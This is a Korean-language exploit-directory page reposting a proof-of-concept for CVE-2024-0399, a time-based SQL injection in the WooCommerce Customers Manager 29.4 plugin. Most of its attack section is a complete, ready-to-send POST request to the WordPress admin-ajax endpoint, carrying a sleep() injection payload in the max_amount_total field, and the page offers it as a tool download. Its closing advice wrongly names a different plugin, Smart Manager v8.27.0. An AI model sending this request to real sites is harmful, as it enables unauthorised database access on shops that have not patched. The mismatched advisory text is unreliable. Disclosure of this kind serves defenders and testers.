Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-0399 — CVE-2024-0399에 대한 개념 증명 익스플로잇으로, WooCommerce Customers Manager 29.4의 인증 후 시간 기반 SQL 주입으로, 관리자 AJAX 엔드포인트를 통해 거래 금액 매개변수를 대상으로 합니다. | Kitploit
도구/GitHubGitHub/xbz0n/cve-2024-0399
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingDatabase Security
GitHubxbz0n/cve-2024-0399

CVE-2024-0399

CVE-2024-0399에 대한 개념 증명 익스플로잇으로, WooCommerce Customers Manager 29.4의 인증 후 시간 기반 SQL 주입으로, 관리자 AJAX 엔드포인트를 통해 거래 금액 매개변수를 대상으로 합니다.

저장소 보기
112년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-0399 - WooCommerce Customers Manager 29.4 - 인증 후 SQL 인젝션

Exploit 제목: WooCommerce Customers Manager 29.4 - 인증 후 SQL 인젝션
날짜: 2024-03-25
익스플로잇 작성자: Ivan Spiridonov - xbz0n
소프트웨어 링크: https://codecanyon.net/item/woocommerce-customers-manager/10965432
버전: 29.4
테스트 환경: Ubuntu 22.04
CVE: CVE-2024-0399

SQL 인젝션

이 플러그인은 SQL 문에서 사용하기 전에 매개변수를 제대로 필터링(샌니타이즈)하거나 이스케이프하지 않아, Subscriber+ 역할로 악용 가능한 SQL 인젝션이 발생합니다.

영향을 받는 구성 요소

  • 플러그인: WooCommerce Customers Manager
  • 버전: 29.4
  • 영향받는 매개변수: 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
  • 영향받는 엔드포인트: /wp-admin/admin-ajax.php

설명

이 취약점은 관리자 AJAX 엔드포인트에서 사용되는 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total' 같은 거래 금액 매개변수에 존재합니다. 이러한 매개변수에 SQL 명령을 주입함으로써 인증된 공격자는 SQL 쿼리를 조작할 수 있으며, 이로 인해 시간 기반 SQL 인젝션 취약점이 발생합니다.

개념 증명

수동 익스플로잇

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="end_date"
2024-01-11
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="customer_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="category_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount_total"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount_total"
(select*from(select(sleep(20)))a)
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_filters_relationship"
and
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="statuses"
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
-----------------------------2461714219322283440478088295--

서버 응답이 약 20초 지연되면 시간 기반 SQL 인젝션의 성공적인 악용을 나타내며, 취약점이 확인됩니다.

권장 사항

WooCommerce Customers Manager v29.4 사용자는 영향을 받는 엔드포인트에 대한 접근을 제한하고, 수정 버전이 출시되는 즉시 플러그인을 업데이트할 것을 강력히 권장합니다. 이 권고는 Smart Manager v8.27.0의 모든 사용자에게 SQL 인젝션 취약점으로부터 보호하기 위해 플러그인 업데이트를 즉시 수행하라는 공지사항입니다.

도구 다운로드